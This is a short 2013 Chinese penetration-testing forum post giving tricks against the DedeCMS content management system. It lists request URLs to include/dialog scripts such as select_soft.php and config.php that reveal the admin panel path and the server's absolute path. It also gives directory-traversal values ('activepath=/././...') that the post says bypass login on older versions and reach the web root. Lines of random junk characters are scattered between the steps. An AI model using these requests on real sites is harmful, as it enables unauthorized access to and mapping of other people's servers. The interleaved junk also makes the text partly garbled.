中国网络渗透测试联盟
标题:
dedecms爆后台文件技巧
[打印本页]
作者:
admin
时间:
2013-4-16 16:50
标题:
dedecms爆后台文件技巧
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
: Z6 u" F" _9 s
+ M9 y2 \ y/ n& | p: q2 R. n
员帐号,新版本的就直接转向了后台.
9 V5 ?- o! ?- W( F6 W3 @
: {# F+ G0 E; S k* V6 w! X# L
2.include/dialog/config.php会爆出后台管理路径
@) l' E1 }, `1 v. U
" C0 V( g; q7 W) F$ y- T3 I
3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录
. I I' b8 n7 v2 f; [
; Z, k7 N- ?7 f5 k7 `. ]
4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.
, }+ P. G; ?+ S! G3 ]
/ @( H1 M; ?* d4 b1 Q/ d
5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
" b" i" F6 N; N# J( p! e0 M+ F
6 L/ |# [) Z! l/ o
到根目录去.不过这些版本的访问地址有些不同.
* l! p9 H U, ?4 j: Q3 R! ?
地址为require/dialog/select_soft.php?activepath=/././././././././
. R( y& y+ \; G# T
5 H2 a" o; R' j \ ^
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..
$ M7 p$ F! b9 b/ y" x
存在相同问题的文件还有
. x8 _2 a; N9 p( l' S
include\dialog\select_images.php
$ c0 J( T% B; t* A& U
include\dialog\select_media.php
& w5 X; r; g" J7 e8 ?
include\dialog\select_templets.php
) s i+ V4 l) H0 q6 Z
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2